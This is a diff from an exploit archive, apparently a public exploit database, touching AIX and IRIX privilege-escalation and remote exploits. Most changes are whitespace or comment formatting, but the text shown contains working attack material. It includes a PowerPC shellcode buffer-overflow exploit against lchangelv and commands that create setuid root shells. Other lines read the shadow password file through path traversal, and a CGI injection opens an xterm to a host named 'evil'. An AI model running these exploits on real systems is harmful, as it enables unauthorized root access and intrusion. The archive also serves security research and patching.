-            0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
-            0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
-            0x7c0903a6 , 0x4e800420, 0x0
-    };
+unsigned int code[]={
+        0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
+        0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
+        0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
+        0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
+        0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
+        0x7c0903a6 , 0x4e800420, 0x0
+};
 
-    char *createvar(char *name,char *value)
-    {
-            char *c;
-            int l;
+char *createvar(char *name,char *value)
+{
+        char *c;
+        int l;
 
-            l=strlen(name)+strlen(value)+4;
-            if (! (c=malloc(l))) {perror("error allocating");exit(2);};
-            strcpy(c,name);
-            strcat(c,"=");
-            strcat(c,value);
-            putenv(c);
-            return c;
-    }
+        l=strlen(name)+strlen(value)+4;
+        if (! (c=malloc(l))) {perror("error allocating");exit(2);};
+        strcpy(c,name);
+        strcat(c,"=");
+        strcat(c,value);
+        putenv(c);
+        return c;
+}
 
-    main(int argc,char **argv,char **env)
-    {
-            unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
-            int min=100, max=280;
-            unsigned int return_address;
-            char *newenv[8];
-            char *args[4];
-            int offset=3200;
+main(int argc,char **argv,char **env)
+{
+        unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
+        int min=100, max=280;
+        unsigned int return_address;
+        char *newenv[8];
+        char *args[4];
+        int offset=3200;
 
-            if (argc==2) offset = atoi(argv[1]);
+        if (argc==2) offset = atoi(argv[1]);
 
-            pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
+        pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
 
-            *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
-            *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000f
-fff);
-            *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
-            *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000
-ffff);
+        *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
+        *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff);
+        *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
+        *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff);
 
-            return_address=(unsigned)&buf[0]+offset;
+        return_address=(unsigned)&buf[0]+offset;
 
-            for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
-            strcpy((char*)&buf[nop],(char*)&code);
-            i=nop+strlen( (char*) &code)/4-1;
+        for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
+        strcpy((char*)&buf[nop],(char*)&code);
+        i=nop+strlen( (char*) &code)/4-1;
 
-            for(i=0;i<max-1;i++) frame[i]=return_address;
-            frame[i]=0;
+        for(i=0;i<max-1;i++) frame[i]=return_address;
+        frame[i]=0;
 
-            newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
-            newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
-            newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
-            newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
-            newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
-            newenv[5]=NULL;
+        newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
+        newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
+        newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
+        newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
+        newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
+        newenv[5]=NULL;
 
-            args[0]="lchangelv";
-            args[1]="-l";
-            args[2]=(char*)&frame[0];
-            execve("/usr/sbin/lchangelv",args,newenv);
-            perror("Error executing execve \n");
+        args[0]="lchangelv";
+        args[1]="-l";
+        args[2]=(char*)&frame[0];
+        execve("/usr/sbin/lchangelv",args,newenv);
+        perror("Error executing execve \n");
 }

platforms/aix/local/19344.sh

@@ -26,4 +26,4 @@ echo "cheezy mail hack" | rmail joeuser@nohost.com
 unsetenv IFS
 rm -f usr sh # minor cleanup.
 echo "Attempting to run sgid shell."
-./mailsh 
+./mailsh

platforms/aix/local/19345.txt

@@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/455/info
 There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format. 
 
 
-/usr/sbin/lquerypv -h /pathtofilename 
+/usr/sbin/lquerypv -h /pathtofilename

platforms/aix/local/19354.txt

@@ -4,4 +4,4 @@ The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vul
 
 Run PrintStatus
 Press the 'help' button.
-Select the 'print to command' option. This will allow you to execute anything as root. 
+Select the 'print to command' option. This will allow you to execute anything as root.

platforms/aix/local/19418.txt

@@ -7,4 +7,4 @@ gcc -g -o a.out hello-world.c
 $ adb a.out -
 adb
 .main,5:s
-a.out: running 
+a.out: running

platforms/aix/local/20452.c

@@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/2032/info
 
 AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges.
 
 The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0. 
+*/
 
 /*## copyright LAST STAGE OF DELIRIUM sep 2000 poland        *://lsd-pl.net/ #*/
 /*## /usr/bin/setsenv                                                        #*/

platforms/aix/local/20453.c

@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/2033/info
 
 AIX is a version of the UNIX Operating System distributed by IBM. A vulnerability exists in the operating system which could allow a user an elevation in priviledge.
@@ -5,6 +6,7 @@ AIX is a version of the UNIX Operating System distributed by IBM. A vulnerabilit
 The problem occurs in the digest binary. It is reported that it is possible to overflow a buffer in the program and overwrite a pointer to the stack, which in turn can result in an overflow in a library referenced by the binary. The secondary overflow in the library makes it possible to overwrite other stack variables, including the return address.
 
 A malicious user could use this vulnerability to gain an elevation in priviledges, and potentially UID 0. 
+*/
 
 /*## copyright LAST STAGE OF DELIRIUM dec 2000 poland        *://lsd-pl.net/ #*/
 /*## /usr/lib/lpd/digest                                                     #*/

platforms/aix/local/20455.c

@@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/2037/info
 
 AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists which can allow a local user elevated priviledges.
 
 The problem exists in the piobe program. Due to the insuffient handling of the PIOSTATUSFILE, PIOTITLE, and PIOVARDIR environment variables, it's possible to overwrite stack variables. This makes it possible for a malicious user to pass specially formatted strings to the program via environment variables, and potentially gain administrative access. 
+*/
 
 /*## copyright LAST STAGE OF DELIRIUM dec 2000 poland        *://lsd-pl.net/ #*/
 /*## /usr/lib/lpd/piobe                                                      #*/

platforms/aix/local/21094.c

@@ -1,10 +1,10 @@
-source: http://www.securityfocus.com/bid/3238/info
-
-The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group.
-
-'piomkapqd' contains a locally exploitable stack overrun condition in it's handling of command line parameters.
-
-Local users may be able to gain group 'printk' privileges if this vulnerability is exploited. It may be possible to elevate to root from this point by exploiting vulnerabilities in other components of the printing subsystem. 
+// source: http://www.securityfocus.com/bid/3238/info
+// 
+// The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group.
+// 
+// 'piomkapqd' contains a locally exploitable stack overrun condition in it's handling of command line parameters.
+// 
+// Local users may be able to gain group 'printk' privileges if this vulnerability is exploited. It may be possible to elevate to root from this point by exploiting vulnerabilities in other components of the printing subsystem. 
 
 /*## copyright LAST STAGE OF DELIRIUM sep 2000 poland        *://lsd-pl.net/ #*/
 /*## /usr/lib/lpd/pio/etc/piomkapqd                                          #*/

platforms/aix/local/25039.txt

@@ -14,4 +14,4 @@ chmod u+s /tmp/.shh
 EOF
 chmod a+x /tmp/aap/bin/Dctrl
 lsmcode
-/tmp/.shh 
+/tmp/.shh

platforms/aix/local/26996.txt

@@ -4,4 +4,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue
 
 -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
 -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
-fopen: No such file or directory 
+fopen: No such file or directory

platforms/aix/local/26997.txt

@@ -8,4 +8,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulne
 
 ps -ef > /tmp/log. $$
 grep test /tmp/log.
-$$ rm /tmp/log. $$ 
+$$ rm /tmp/log. $$

platforms/aix/remote/19047.txt

@@ -13,4 +13,4 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxx
-[dead] 
+[dead]

platforms/aix/remote/19048.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/64/info
 
 There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.
 
-$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|' 
+$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'

platforms/aix/remote/19237.txt

@@ -4,4 +4,4 @@ NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsol
 
 Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay.
 
-Specify <> in the 'Mail From' field. 
+Specify <> in the 'Mail From' field.

platforms/aix/remote/19348.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/458/info
 
 A problem with the way login parses arguments as passed by rlogind that may allow access to the root account. 
 
-%rlogin -froot targethost.com 
+%rlogin -froot targethost.com